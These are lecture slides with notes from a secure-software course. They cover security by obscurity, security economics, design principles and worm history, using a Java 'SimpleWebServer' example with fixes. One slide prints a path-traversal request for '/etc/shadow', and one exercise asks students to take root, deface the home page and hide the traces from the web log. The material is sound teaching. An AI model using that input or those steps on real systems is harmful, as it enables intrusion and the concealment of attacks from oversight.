Ex: Nokia GGSN crashes on packet with TCP option field set to 0xFF

63 2.5.3. Handling Internal Errors Securely
Error messages and observable behavior can tip off an attacker to vulnerabilities Fault Injection: Providing a program with input that it does not expect (as in the DoS attack against SimpleWebServer) and observing its behavior “Ethical” hackers often hired to find such bugs

64 2.5.4. Including Validation and Fraud Checks
Requirements should specify which error cases & threats to handle
Credit Card Example:
Mod 10 Checksum: ensures validity of number, to catch user typos (a sketch follows)
CVC: guards against fraudsters who have stolen the number but don't know the CVC
Full credit card check might be too costly
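The Mod 10 (Luhn) checksum the slide refers to is public and easy to implement. The sketch below validates a digit string; the second number shown differs from the first by one digit, so the check catches the "typo".

public class Luhn {
    /* Mod 10 check: from the rightmost digit, double every second digit,
       subtract 9 from doubled values over 9, and sum; valid iff sum % 10 == 0. */
    static boolean valid(String number) {
        int sum = 0;
        boolean doubleIt = false;
        for (int i = number.length() - 1; i >= 0; i--) {
            int d = number.charAt(i) - '0';
            if (doubleIt) {
                d *= 2;
                if (d > 9) d -= 9;
            }
            sum += d;
            doubleIt = !doubleIt;
        }
        return sum % 10 == 0;
    }

    public static void main(String[] args) {
        System.out.println(valid("4111111111111111")); // true: a common test number
        System.out.println(valid("4111111111111112")); // false: typo caught
    }
}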

65 2.5.5. Writing Measurable Security Requirements
Access Control Security: Only certain users can do certain functions Auditing: Maintain log of users’ sensitive actions Confidentiality: encrypt certain functions’ output Availability: Certain features should be available almost always Include these requirements in design docs!

66 2.5.6. Security or Bust
Should not ship code unless it's secure
The advantage gained by launching earlier could be lost due to vulnerabilities that tarnish the brand and lead to lost revenue
Ex: Microsoft delayed the ship of .NET Server in '02 because security requirements were not met by the “code freeze” deadline

67 2.6. Security by Obscurity Trying to be secure by hiding how systems and products work (to prevent info from being used by attacker) Ex: Military uses Need to Know basis Maybe necessary, but not sufficient to prevent determined attackers

68 2.6.1. Flaws in the Approach
What assumptions should we make about the adversary?
Knows algorithms? Or not? Are algorithms in “binary” secret?
Attackers can probe for weaknesses:
reverse engineer executables
observe behavior in normal vs. aberrant conditions (use fault injection)
Fuzzing: systematically trying different input strings to find an exploit (a sketch follows below)
blackmail insiders
Now that we have added security requirements to the requirements documents of our information systems, let's talk about how we should go about implementing mechanisms that enforce those security requirements. Many organizations practice “security by obscurity.” That is, they attempt to keep things secure by keeping them secret. For example, companies keep many trade secrets, and sometimes don't even tell their customers how their products work. Military organizations only disseminate information to people on a “need to know” basis. In both these cases, an organization is trying to keep information secure by hiding it from others. While it is possible to achieve some level of security by hiding information, that is, through obscurity, it may not always make sense to assume that an attacker does not know how the system works. For example, one might assume that a user might not be able to understand how a program works because it is deployed as an executable binary file (i.e., a .exe file). However, an attacker can easily disassemble, decompile, or reverse engineer the executable. Also, the attacker could derive information about how the program functions simply by observing its behavior under normal conditions, and/or its behavior on inputs that the attacker selects. (Can we come up with a simple example?) In addition to the technical approaches above, the attacker may also potentially be able to blackmail or coerce those that do know how the system works into disclosing details about how it works. To be conservative, we may therefore want to assume that the attacker knows exactly how the system to be attacked works. As such, we may want to avoid practicing security by obscurity if a better option exists. In the following, we will talk about how it may be possible to build a secure system whose design could be public knowledge, where the security of the system does not depend upon hiding design details, but instead depends on certain “keys” being secret. By “keys” we mean relatively short sequences of bits. It is usually much easier to keep a few “keys” secret compared to keeping all of the information about how a system functions secret.
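A crude fuzzing sketch against the SimpleWebServer from Chapter 2, assuming it is listening on localhost:8080 as in the earlier code; it throws random request lines at the server and reports what happens, which is how the carriage-return crash would surface in testing. The class name and trial count are made up.

import java.io.IOException;
import java.io.OutputStream;
import java.net.Socket;
import java.util.Random;

public class SwsFuzzer {
    public static void main(String[] args) throws Exception {
        Random rnd = new Random();
        for (int trial = 0; trial < 100; trial++) {
            byte[] junk = new byte[rnd.nextInt(64)];
            rnd.nextBytes(junk);                         // random bytes as a "request"
            try (Socket s = new Socket("localhost", 8080)) {
                OutputStream out = s.getOutputStream();
                out.write(junk);
                out.write('\n');                         // terminate the request line
                out.flush();
                int first = s.getInputStream().read();   // -1 if the server just drops us
                System.out.println("trial " + trial + ": server replied " + first);
            } catch (IOException e) {
                /* connection refused here on later trials suggests the server died */
                System.out.println("trial " + trial + ": connection failed - " + e.getMessage());
            }
        }
    }
}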

69 Secret Keys
Kerckhoffs' doctrine (1883): “The method used to encipher data is known to the opponent, and security must lie in the choice of key.”
assume the worst case!
obscurity alone is not sufficient
A compromised key can be changed without re-designing the system.
A key is easier to keep secret
The concept of assuming that the attacker knows how the system functions, and that the security of the system should be dependent upon a “key,” goes back to Kerckhoffs' doctrine in 1883. We will see various algorithms whose details are completely public, yet secure, in the next chapters on applied cryptography. For now, just keep in mind that hiding the details of how your system works does not typically provide an acceptable level of security. In fact, if the design of a system is not reviewed by a third party, it is more likely than not that it will contain security holes that the original designer did not conceive of but that will be relatively obvious to third parties. (This is true unless, of course, the original designer is an experienced, expert cryptographer!)

70 SWS Obscurity Just distributing Java bytecode of SWS (and not source code) not enough security Can be disassembled or decompiled (e.g. Mocha, Jad) to produce rough source code Even disassembling can reveal the DoS exploit of the vulnerable tokenization process

71 2.6.2. Disassembling SWS public void processRequest(java.net.Socket);
throws java/lang/Exception Code: 0: new 25; //class BufferedReader 3: dup 4: new 26; //class InputStreamReader 7: dup 8: aload_1 9: invokevirtual 27; 12: invokespecial 28; 15: invokespecial 29; 18: astore_2 19: new 30; //class OutputStreamWriter 22: dup 23: aload_1 24: invokevirtual 31; 27: invokespecial 32; 30: astore_3 31: aload_2 32: invokevirtual 33; 35: astore 4 37: aconst_null 38: astore 5 40: aconst_null 41: astore 6 43: new 34; //class StringTokenizer 46: dup 47: aload 4 49: ldc 35; //String 51: invokespecial 36; 54: astore 7 56: aload 7 58: invokevirtual 37; 61: astore 5 63: aload 7 65: invokevirtual 37; 68: astore 6 70: aload 5 72: ldc 38; //String GET 74: invokevirtual 39; 77: ifeq 90 80: aload_0 81: aload_3 82: aload 6 84: invokevirtual 40; 87: goto 90: aload_3 91: ldc 41; 93: invokevirtual 42; 96: goto 101 99: astore 8 101: aload_3 102: invokevirtual 44; 105: return

72 2.6.3. Things to Avoid
Don't “invent” your own encryption algorithm!
Don't embed keys in software!
Nor in the Windows Registry, which is readable by all
Don't forget code reuse: reuse well-tested software known to be reliably secure instead of doing the same thing from scratch
The idea of not providing security through obscurity entails many rules of thumb that one should keep in mind when designing secure systems. Here, we state a few such rules of thumb, and examples of things that designers should stay away from. For instance, system designers should not attempt to “invent” their own algorithms for encryption. Designing encryption algorithms is a tricky and challenging business that should be left to cryptographers. If someone does decide to invent a new encryption algorithm, they should keep in mind that it will not be secure simply because no one else knows how it works. A good cryptanalyst can take advantage of modern cryptanalytic techniques to break the security of most ad hoc encryption schemes. If one does decide to attempt to invent a new encryption algorithm, the design of the algorithm should be reviewed by others, and should be reviewed by the community of cryptographers. The security of a good encryption scheme should be dependent on well-chosen secret keys, not on the obscurity of the algorithm itself. In addition, it is not recommended that one develop new implementations of existing encryption algorithms. Coming up with new encryption algorithms that are secure is hard, and getting the implementation of a cryptographic algorithm (new or old) right is just as hard. A slight bug in the implementation of an encryption algorithm can be the door to a serious security hole. There are many well-known implementations of encryption algorithms (we will cover some of these later in the course), and a system designer should opt to re-use an existing, tested implementation that has already been looked over and tested by many smart people. While re-use of software is generally a good idea, it is an especially good idea when it comes to encryption and other cryptographic algorithms. Another rule of thumb that can be derived from the fact that security by obscurity is typically not good security is that one should not, whenever possible, attempt to embed secret keys in software. Keep in mind that software is compiled into binary code, and can be disassembled, decompiled, and/or reverse engineered. Secret keys will not stay secret simply because binary files are “hard to read.” In fact, a good secret key is typically a random sequence of bits, while binary code that contains machine instructions often has predictable patterns. So, if you attempt to “hide” a secret key in a binary executable, it will probably exhibit more randomness (entropy) than the rest of the code. As a result, an encryption key buried in a binary executable can be easily discerned if it is a good key (a random sequence of bits) and is sufficiently long (another property of a good key). So, the moral of the story is that secret keys should not be stored in program code if possible. A secure program will not attempt to achieve security by simply storing secret information in “hard to reach” places. For instance, some programs attempt to protect secret information by storing it in the Windows Registry. The Windows Registry is a part of the Windows operating system that applications can use to store configuration information. Most users of Windows PCs do not know how to read the information in the registry, but hackers (attackers) certainly will.
A program that attempts to store a password in the Windows Registry in hopes of keeping the password secret is doomed to be hacked. A hacker can simply run the “regedit” command at the Windows prompt or use the Windows API to read the password out of the registry. So, if information is to be stored in the Windows Registry for security purposes, it should be encrypted. Of course, based on our prior rule of thumb, the encryption key should not be stored in a susceptible location (such as the program that uses the key) either. The encryption key should ideally be derived from a password that the end-user does not write down anywhere, and only enters into the program that needs to use it whenever necessary.

73 2.7. Open vs. Closed Source
“Is open-source software secure?”
Open: some people might look at the security of your application (if they care); they may or may not tell you what they find
Closed: not making code available does not hide much; you still need diverse security-aware code reviews
A business decision, not a security one!
There are a plethora of companies that need to secure their software, are aware of the “security by obscurity” problem, and decide to make their software “open-source” in order to secure it. When a company makes a piece of software “open-source,” it makes the source code available to the entire world for review. They reason that if a piece of software can only be made secure by subjecting it to an open review process, then why not make it open to the entire world, such that people can point out problems and the company can simply fix them. While the company might have good intentions, it is making a yet more detailed set of assumptions if it believes that it can create more secure software by open-sourcing it. The first additional assumption that the company would be making is that by open-sourcing its software, others would actually look at the source code of the software, and specifically would look at the sections of code that might lead to security flaws. If the source code is hard to read, not very understandable, uninteresting, etc., the code will probably not be read at all. In addition, if an open-source developer actually does look at the code, he or she might be interested in looking at a piece of the code whose functionality they are interested in modifying for their own purposes. The open-source developer might want to change the GUI, or adapt some part of the functionality to serve a specific request that one of their customers might have. Security may or may not be on the agenda of the open-source developer. Finally, even if the open-source developer is interested in the security of the program, there is no assurance that he or she will actually report any security vulnerabilities to the author of the code. The open-source “developer” may be malicious and may be looking to attack some deployed version of the software in question. Due to all these reasons, the simple act of making a piece of software open-source will not automatically lead to an increase in its security. On the other hand, keeping a piece of software proprietary (“closed-source”) does not ensure the security of a program either, for all the reasons that we discussed in the security by obscurity section. Only releasing the binary code of an application does not hide much from the attacker, and the attacker can still exploit security holes by studying the behavior of the running program. Even if a company keeps its code proprietary, the code should be reviewed by security experts to look for vulnerabilities. What this all means is that if you want to ensure the security of an application, you need to spend time reviewing the code for security vulnerabilities. You can't simply open-source it in the hope that others will find security flaws for you, and you can't hope that it will be secure just because you don't release the source code. You need to spend time reviewing the security of your application yourself if you indeed want it to be secure. By open-sourcing a piece of software, one might argue that they could be just making the hacker's job a little easier. This is possible, but a determined hacker doesn't need the source code. This does not contradict what we said when we talked about security by obscurity.
Hiding the source code of an application does not make it much harder to attack. At the end of the day, the decision to open-source a piece of software or keep it closed-source should be a business decision. Is open-sourcing or keeping the code proprietary more complementary with the business model under which the software is intended to generate revenue? (There is a good discussion of this topic in “Building Secure Software” by John Viega and Gary McGraw.)

74 2.8. A Game of Economics
All systems are insecure: the question is how insecure
What is the cost to break the system? The weakest link?
For every $ that the defender spends, how many $ does the attacker have to spend?
If (cost to “break” system >> reward to be gained), then the system is secure
Otherwise the system is NOT secure
“Raise the bar” high enough
Security is about risk management
Another important thing to realize before embarking on the design of a secure system is that security can be viewed as a game of economics. In fact, all systems can be considered insecure, and the real question becomes how insecure. Specifically, the insecurity of an application can be measured by the expected cost that an attacker would need to spend to achieve his or her attack. This expected cost can be made up of the amount of time the attacker needs to spend, the materials and technology that the attacker would need to acquire, and the risk that the attacker thinks he or she might get caught. When we study applied cryptography in the next chapter, we will see that the amount of security that any particular cryptographic algorithm offers is partially a function of how many bits long the secret key used with that algorithm is. For each additional bit of data in the key, the amount of time that an attacker may have to spend to attack the algorithm is multiplied by two. Another interesting question to look at from a security standpoint is: for every dollar that the defender spends, how many dollars does the attacker need to spend? While it is interesting to think about security in these terms, it is typically hard to come up with quantitative numbers to answer these types of questions. Nevertheless, it is useful to pose these questions to help get our heads around the nature of the problem of security. In this view of the world, where we consider all systems to be insecure, the next relevant question is: what does it take to make sure that a system is “secure enough”? We might define “secure enough” to mean that the expected cost to break into the system is much greater than the potential reward to be gained by the attacker. If a system is “secure enough,” then there does not exist enough economic incentive for the attacker to break into the system. In chapters 6 through 8 of this course, we will study a number of defenses that one can employ to make a system “secure enough” against an “average” hacker. (Where average means that the attacker does not have any special vendettas or special rewards for breaking into your system.) The bottom line is that security is about risk management. How much technology does one need to employ to manage the risk that an attack might achieve its goals? If no technology is employed, the risk that an attack will be successful is high. If some technology is employed, the risk that the “average” hacker will successfully mount an attack might be drastically reduced. If a lot of technology is employed (and it is targeted at addressing the most relevant threats, and there aren't any physical or policy-oriented holes, etc.), then it is likely that all but the most sophisticated hackers will be unable to mount a successful attack, and the risk is low.

75 2.8. Economics Example
Two ways to break a system with an L-bit key:
Brute-force search for the key: costs C dollars/try
“Pay off” an employee (earning salary S yearly for Y years, at interest rate r) for the key: costs P = Σ_{i=0..Y} S·(1+r)^(Y-i) dollars
Brute-Force Total Cost: on average, try half the keys
Cost = (C/2)(2^L) = 2^(L-1)·C
Ex: Say P = $5 million, L = 64, C = 3.4e-11; the brute-force cost is > $300 million (better to pay off)
Break-even point: 2^(L-1)·C = Σ_{i=0..Y} S·(1+r)^(Y-i)
A worked computation follows.

76 2.9. “Good Enough” Security
Alpha Version: security should be good enough Won’t have much to protect yet Difficult to predict types of threats But still set up a basic security framework, “hooks” Beta Version: throw away alpha Design in security to deal with threats discovered during testing

77 Summary
Threats (DoS, Phishing, Infiltration, Fraud, …)
SimpleWebServer
Security by Obscurity Fails
Economics Game (cost >> reward for attacker)
“Good Enough” Security: Design Incrementally From the Beginning

78 CHAPTER 3 Secure Design Principles

79 Agenda Principle of Least Privilege
Defense-in-Depth & Diversity-in-Defense Secure the Weakest Link Fail-Safe Stance Secure by Default Simplicity & Usability We will now shift gears from talking about general high-level approaches and tradeoffs to talking about design principles.

80 3.1. Principle of Least Privilege
Just enough authority to get the job done.
Common-world ex: Valet Keys
Valets can only start the car and drive it to the parking lot
Highly elevated privileges are unnecessary
Ex: a valet key shouldn't open the glove compartment
Web server ex: can read, but not modify, the HTML files
The more power an attacker gets, the more vulnerable the system
In the latter half of this chapter, we will focus on discussing a few well-known secure design principles. The first principle, the principle of least privilege, states that to ensure security in a system, a process should only be given access to the most limited set of resources necessary to accomplish its task. That is, a user or a computer program should only be given just enough authority to get his or her or its job done. A common everyday example of the principle of least privilege at work in the physical world is the use of valet keys. A valet is someone who parks your car for you when you arrive at a hotel or restaurant, and people give their car keys to valets so that they can do so. Most cars that you buy these days come with special valet keys, and valets are given valet keys to park cars. The valet key allows the valet to only start the car and drive it to its parking spot. The valet key does not give the valet access to open the glove compartment or the trunk, where valuables might be kept. The idea is to give the valet access to only those resources necessary to do his or her job of parking the car. If we wanted to design a valet key system for an automobile even better, we might limit the number of miles that could be driven with the valet key! Similarly, we should follow the same principle when designing our computer programs. If a web server is responsible for serving files to web users, the web server should only be given access to the set of HTML files that the web server is to serve. By following this approach, if the web server is broken into and the attacker is able to access a command shell, the most that the attacker would be able to do is read the HTML files. Unfortunately, sometimes web servers are run with elevated privileges that give them access to other parts of a file system as well, and are also given the ability to modify files (as some CGI scripts may need to do). A principle-of-least-privilege approach would limit the amount of damage that an attacker might be able to do if the web server is limited in the privileges that it has. However, in the real world, even if the web server is being run with limited privileges, there are typically so many vulnerabilities that attackers are able to find ways to elevate the privileges of an account even if it typically only has the ability to read files on a particular part of the file system. Nevertheless, this does not mean that we should not try to protect our systems by employing the principle of least privilege! Ex: Avoid setuid to root. Another example of how attackers can infiltrate a system that does not correctly take advantage of the principle of least privilege is bad set-uid scripts. On UNIX systems, it is sometimes necessary to elevate the privilege of a process. For example, when a user wants to change her password, the “passwd” program that is used to do this must make changes to the system password file once it authenticates the user. The only user that typically has access to modify this file, which contains the usernames and passwords of all the users in the system, is the administrator.
But in order for the passwd program to work, the passwd program itself must be given administrator privileges to change the password for the user's account once the user is authenticated. The passwd program is said to have its uid, or user id, set to root (the administrator account) when it runs. That is, regardless of which user runs the passwd program, the program is executed with elevated privileges (that of root instead of the regular user) to do its job. While the passwd program is an example of a program that absolutely must be set-uid to root to get its job done, there are examples of other UNIX programs that were set-uid to root that didn't absolutely need this privilege. These programs violate the principle of least privilege and lead to security vulnerabilities. For example, an old version of the “lpr” command in the UNIX system was used to print files, and could be told to delete a file after it was printed. The old version of this command used to be set-uid to root because the file would need to be copied to a special “print spool” directory owned by root. So, it was possible to abuse “lpr” to delete other people's files. The way this would work is you provide the name of some other user's file to lpr and you also tell it to delete the file. Since lpr runs with root privileges, it copies the file into the print spool directory, and then deletes it. The root account is allowed to delete any file, and so it does not matter that you may not be authorized to delete the other person's file; when you run lpr, you are given elevated root privileges, and are allowed to do anything that lpr will let you. Had the principle of least privilege been followed in the original design of the lpr command, the command would not be set-uid to root. Instead, a separate user account would have been created for the express purpose of printing files. The print spool directory would be owned by that account. The lpr command would be rewritten to execute in two sub-processes. Sub-process 1 would be set-uid to the print-spool account and copy the file to be printed into the print spool directory, and sub-process 2 would be the traditional rm command that only allows a user to delete his or her own file. Least privilege can minimize the damage that can result from an attack by a Trojan horse.

81 3.1. SimpleWebServer Example
If SWS is run under the root account, clients could access all files on the system! The serveFile() method creates a FileReader object for an arbitrary pathname provided by the user: GET ../../../../etc/shadow HTTP/1.0 traverses up to the root directory; /etc/shadow on UNIX contains the list of usernames & encrypted passwords! An attacker can use this to launch a dictionary attack. Need to canonicalize and validate the pathname. Obey least privilege: don't run the server under root!

82 3.1. Canonicalizing Pathnames
checkPath() method: ensure the target path is below the current path, with no .. in the pathname. Then serveFile() uses the normalized path:

String checkPath (String pathname) throws Exception {
    File target = new File(pathname);
    File cwd = new File(System.getProperty("user.dir"));
    /* User's current working directory stored in cwd */
    String targetStr = target.getCanonicalPath();
    String cwdStr = cwd.getCanonicalPath();
    if (!targetStr.startsWith(cwdStr))
        throw new Exception("File Not Found");
    else
        return targetStr;
}

fr = new FileReader (checkPath(pathname));

83 3.2. Defense-in-Depth Also called redundancy/diversity: layers of defense; don't rely on any one layer for security Examples Banks: security guards, bullet-proof teller windows, dye packs on the money The many different types of magic and many levels of defense protecting the Sorcerer's Stone in Harry Potter Banks: security guards (guns), bulletproof glass, cash with dye, …

84 3.2.1. Prevent, Detect, Contain, and Recover
Should have mechanisms for preventing attacks, detecting breaches, containing attacks in progress, and recovering from them Detection particularly important for network security since it may not be clear when an attack is occurring

85 3.2.2. Don’t Forget Containment and Recovery
Preventive techniques not perfect; treat malicious traffic as a fact, not exceptional condition Should have containment procedures planned out in advance to mitigate damage of an attack that escapes preventive measures Design, practice, and test containment plan Ex: If a thief removes a painting at a museum, the gallery is locked down to trap him.

86 3.2.3. Password Security Example
Sys Admins can require users to choose strong passwords to prevent guessing attacks To detect, can monitor server logs for large # of failed logins coming from an IP address and mark it as suspicious Contain by denying logins from suspicious IPs or require additional checks (e.g. cookies) To recover, monitor accounts that may have been hacked, deny suspicious transactions
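A minimal Java sketch of the detect-and-contain steps described above – counting failed logins per source IP and flagging an IP once it crosses a threshold. All names here (FailedLoginMonitor, THRESHOLD) are illustrative, not from the slides:

import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

/* Illustrative sketch: detect brute-force guessing by counting failed
   logins per source IP; contain by flagging IPs past a threshold. */
public class FailedLoginMonitor {
    private static final int THRESHOLD = 10;   // failures before flagging
    private final Map<String, Integer> failures = new ConcurrentHashMap<>();

    /* Detection: call on every failed login attempt. */
    public void recordFailure(String ip) {
        failures.merge(ip, 1, Integer::sum);
    }

    /* Containment: deny logins (or demand extra checks, e.g. cookies)
       from IPs marked suspicious. */
    public boolean isSuspicious(String ip) {
        return failures.getOrDefault(ip, 0) >= THRESHOLD;
    }
}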

87 3.3. Diversity-in-Defense
Using multiple heterogeneous systems that do the same thing Use a variety of OSes to defend against virus attacks Second firewall (different vendor) between server & DB Cost: IT staff need to be experts in, and apply patches for, many technologies Weigh extra security against extra overhead

88 3.4. Securing the Weakest Link
"Information System is only as strong as its weakest link.“ Common Weak Links: Unsecured Dial-In Hosts: War Dialers Weak Passwords: easy to crack People: Social Engineering Attacks Buffer Overflows from garbage input

89 Weak Passwords One-third of users choose a password that could be found in the dictionary Attacker can employ a dictionary attack and will eventually succeed in guessing someone's password By using Least Privilege, can at least mitigate damage from compromised accounts
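To make the prevention side concrete, a hedged Java sketch that rejects any password found verbatim in a word list; the dictionary path and all names are placeholders:

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashSet;
import java.util.Set;

/* Illustrative sketch: a password appearing in a dictionary file is
   trivially crackable and should be rejected at choose-password time. */
public class DictionaryCheck {
    private final Set<String> words = new HashSet<>();

    public DictionaryCheck(String dictionaryPath) throws IOException {
        for (String w : Files.readAllLines(Paths.get(dictionaryPath))) {
            words.add(w.trim().toLowerCase());
        }
    }

    public boolean isWeak(String password) {
        return words.contains(password.toLowerCase());
    }
}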

90 People Employees could fall for phishing attacks (e.g. someone calls them pretending to be the “sys admin” and asks for their password) Especially a problem for larger companies Malicious Programmers Can put back doors into their programs Should employ code review Keep employees happy, less incentive for them to defraud company Also distribute info on need-to-know basis, perform background checks on hires

91 3.4.3. Implementation Vulnerabilities
Correct Design can have bugs in implementation Misuse of encryption can allow attacker to bypass it and access protected data Inadvertent mixing of control and data Attacker feeds input data that’s interpreted as a command to hijack control of program Ex: buffer overflows, SQL injection

92 3.5. Fail-Safe Stance Expect & Plan for System Failure
Common-world example: elevators Designed with the expectation of power failure In a power outage, safety brakes grip the cables or guide rails Ex: If a firewall fails, let no traffic in Deny access by default Don't fail open and accept all traffic (including malicious traffic); that gives attackers an added incentive to cause failure If elevator power fails, the brakes grip the cables by default. Say you are developing a client for a system that sends a password to an authentication server to check it. If the authentication server is down, access should be denied by default for all clients.
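A minimal Java sketch of the fail-safe stance for the password-checking client described in the notes; AuthServer and its method are hypothetical names:

/* Illustrative sketch: access is granted only if the authentication
   server explicitly says yes; a down or erroring server means "deny". */
interface AuthServer {
    boolean checkPassword(String user, String password) throws Exception;
}

class FailSafeLogin {
    static boolean isAuthenticated(AuthServer server, String user, String password) {
        try {
            return server.checkPassword(user, password);
        } catch (Exception e) {
            return false;   // fail-safe: deny by default on any failure
        }
    }
}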

93 SWS Fail-Safe Example

public void serveFile (OutputStreamWriter osw, String pathname) throws Exception {
    FileReader fr = null;
    int c = -1;
    StringBuffer sb = new StringBuffer();
    /* ...code excluded... */
    while (c != -1) {
        sb.append((char)c);   // if memory runs out, crashes!
        c = fr.read();
    }
    osw.write (sb.toString());
}

Crashes, but doesn't do something insecure. Still a bug, since it can be used for DoS: an attacker could request /dev/random, an effectively infinite-length file.

94 3.5.2. Checking the File Length
One fix: have a default maximum amount of data to read from the file; only serve the file if sufficient memory is available. Still doesn't work for /dev/random, since it's a special file whose length is reported as 0 (it doesn't actually exist on disk).

pathname = checkPath(pathname);   // canonicalize
File f = new File (pathname);
/* ... */
if (f.length() > Runtime.getRuntime().freeMemory()) {
    throw new Exception();
}

95 3.5.3. Don’t Store the File in Memory
Instead of storing the bytes of the file before sending it, just stream it. Problem: /dev/random causes the server to be tied up forever servicing the attacker's request, unable to serve other legitimate requests (DoS still possible).

while (c != -1) {
    osw.write(c);   // No StringBuffer storage
    c = fr.read();
}

96 3.5.4. …and Impose a Download Limit
To properly defend against the /dev/random attack, impose a maximum download limit. Tradeoff: limit too low, legitimate files get truncated; limit too high, DoS is still a threat from abusive requests.

while ((c != -1) && (sentBytes < MAX_DOWNLOAD_LIMIT)) {
    osw.write (c);
    sentBytes++;
    c = fr.read();
}

97 3.6. Secure By Default Only enable the 20% of a product's features that are used by 80% of the user population "Hardening" a system: all unnecessary services off by default More enabled features means more potential exploits and decreased security Example: Windows OS shipped with all features turned on to get users hooked; viruses like Code Red and Nimda exploited IIS vulnerabilities For example, Windows traditionally shipped with many (network) services on by default (i.e., IIS!). Vulnerabilities become available to attackers immediately after the system is installed and set up! To prevent this, create a "hardened" version of your system, and base new installations on the hardened version.

98 3.7. Simplicity Security holes likely in complex software
Simpler design is easier to understand and audit. Choke point: a centralized piece of code through which all control must pass; keeps security checks localized and easier to test (see the sketch below). Less functionality = less security exposure.
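A minimal Java sketch of such a choke point; every name here is invented for illustration:

/* Illustrative sketch: every request is dispatched through one gate, so
   the security check lives in exactly one, easily audited place. */
class Request {
    String user;
    String action;
}

class RequestGate {
    void dispatch(Request req) {
        if (!isAuthorized(req)) {    // the single, centralized check
            throw new SecurityException("access denied");
        }
        handle(req);                 // only reachable via the gate
    }

    private boolean isAuthorized(Request req) {
        return req != null && req.user != null;   // placeholder policy
    }

    private void handle(Request req) {
        /* application logic */
    }
}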

99 3.8. Usability Usable = users can easily accomplish the tasks they need to do with the software Don't rely on documentation: enable security features by default; design them to be easy to use Difficulty is the tradeoff with user convenience Users are lazy (they ignore security dialogs) Prevent users from committing insecure actions; assist them in acting securely "Why Johnny Can't Encrypt" – "usability for security" Usability: when to *use* security features? Users don't know what they need: stock quote example: users might say they just want their quotes fast and unencrypted (the information is public anyway), but a bad guy could change the content and force people into trades they wouldn't otherwise make, since few people actually double-check stock quote info.

100 3.8. Usability for Security
Definition: (Whitten-Tygar) Security software is usable if the people who are expected to use it: are reliably made aware of security tasks they need to perform are able to figure out how to successfully perform those tasks do not make dangerous errors are sufficiently comfortable with the interface to continue using it Need to come up with a compelling example.

101 3.9. Security Features Do Not Imply Security
Using one or more security algorithms/protocols will not solve all your problems! Using encryption doesn't protect against weak passwords. Using SSL doesn't protect against buffer overflows. Schneier: "Security is a process, not a product!" Can never be completely secure; instead provide a risk assessment (more testing lessens risk) An attacker only needs to find one flaw; designers have to try to cover all possible flaws Security features can help, but they can't stop bugs

102 Summary Employ a few key design principles to make system more secure.
Avoid elevated privileges Use layered defense (prevention, detection, containment, and recovery) Secure weakest links Have fail-safes, i.e. crash gracefully Don’t enable unnecessary features Keep design simple, usable Security features can’t compensate for bugs In the previous chapter, we covered a number of high-level requirements that more secure systems strive to provide. In this chapter, we will discuss a number of design principles that security architects typically keep in mind when building secure systems.

103 CHAPTER 4 Exercises for Part 1

104 Conceptual Exercises Are there dependencies between any of the security concepts that we covered? For example, is authentication required for authorization? Why or why not? What happens if a client connects to SimpleWebServer, but never sends any data and never disconnects? What type of an attack would such a client be able to conduct?

105 Programming Problem (1)
HTTP supports a PUT command that allows users to upload files in addition to retrieving them. What threats would you need to consider if SimpleWebServer also had functionality that could be used to upload files? For each of the specific threats you just listed, what types of security mechanisms might you put in place to mitigate the threats?

106 Programming Problem (2)
public void storeFile (BufferedReader br, OutputStreamWriter osw, String pathname) throws Exception {
    FileWriter fw = null;
    try {
        fw = new FileWriter(pathname);
        String s = br.readLine();
        while (s != null) {
            fw.write(s);
            s = br.readLine();
        }
        fw.close();
        osw.write("HTTP/1.0 201 Created");
    } catch (Exception e) {
        osw.write("HTTP/1.0 500 Internal Server Error");
    }
}

public void logEntry(String filename, String record) throws Exception {
    FileWriter fw = new FileWriter (filename, true);
    fw.write(getTimestamp() + " " + record);
    fw.close();
}

public String getTimestamp() {
    return (new Date()).toString();
}

Modify the processRequest() method in SWS to use this file storage and logging code.

107 Programming Problem (3)
Run your web server and mount an attack that defaces the index.html home page. Assume that the web server is run as root on a Linux workstation. Mount an attack against SimpleWebServer in which you take ownership of the machine that it is running on. By taking ownership, we mean that you should be able to gain access to a root account, giving you unrestricted access to all the resources on the system. Be sure to cover your tracks so that the web log does not indicate that you mounted an attack.

113 CHAPTER 5 Worms and Other Malware

114 Agenda Worms spread across the Internet through vulnerabilities in software History of worms: Morris Worm Code Red Nimda Blaster & SQL Slammer Rootkits, Botnets, Spyware, and other malware

115 5.1. What Is a Worm? Virus: program that copies itself into other programs Could be transferred through infected disks Rate dependent on human use Worm: a virus that uses the network to copy itself onto other computers Worms propagate faster than viruses Large # of computers to infect Connecting is fast (milliseconds) First, we survey some of the most popular and serious viruses and worms that have wreaked havoc by taking advantage of buffer overflow vulnerabilities in widely deployed programs. For the purposes of this course, we define a virus as a computer program that is capable of making copies of itself and inserting those copies into other programs. A virus may copy itself into programs stored on a computer's hard disk or onto floppy disks inserted into the computer. A worm is a virus that is capable not only of copying itself into other programs on disks attached to a particular computer, but of using a computer network to copy itself onto other computers (and/or their attached disks). While computer viruses are a serious threat, the damage they can cause is limited by the number of floppy disks that are infected and then inserted into other computers. Worms spread much more quickly, since a computer infected with a worm can constantly make connections to other computers anywhere on the network and infect them. More info in "White-Hat" Security Arsenal by Avi Rubin.

116 5.2. An Abridged History of Worms
Examples of how worms affect operation of entire Internet First Worm: Morris Worm (1988) Code Red (2001) Nimda (2001) Blaster (2003) SQL Slammer (2003)

117 5.2.1. Morris Worm: What It Did
Damage: 6,000 computers in just a few hours Extensive network traffic from the worm propagating What: just copied itself; didn't touch data Exploited and used: buffer overflow in fingerd (UNIX) sendmail debug mode (execute arbitrary commands, such as copying the worm to another machine) dictionary of 432 frequently used passwords to log in and remotely execute commands via rexec, rsh The first computer worm ever built was the Morris worm (named after Robert Morris). When first deployed, it infected over 6,000 computers within just a few hours, at a rate of hundreds of computers a minute. A computer virus would spread much more slowly, since new computers can only be infected at the rate at which floppy disks move from infected machines to uninfected ones; a virus needs the help of a human operator to spread, while a worm does not. As long as an infected computer was connected to the network, it could contact other uninfected computers and spread to them. So what did the Morris worm do? Luckily, all it did was make copies of itself to other computers on the network. But that in itself caused significant damage: the network traffic generated by the worm scanning for other computers to infect was significant, as was the effort required by system administrators to determine whether a particular computer was infected and to remove it. How did the Morris worm work? Once running, it would scan the files /etc/hosts.equiv and /.rhosts to find other machines to attack, then try to remotely log in to some of those hosts as one "vector" (or method) of attack. The worm carried a dictionary of 432 "common" passwords that it would try in order to break into user accounts. If it could not directly log in to other hosts, it used two additional vectors: a buffer overflow vulnerability in fingerd, and a bug in the sendmail program that is used to route email from one 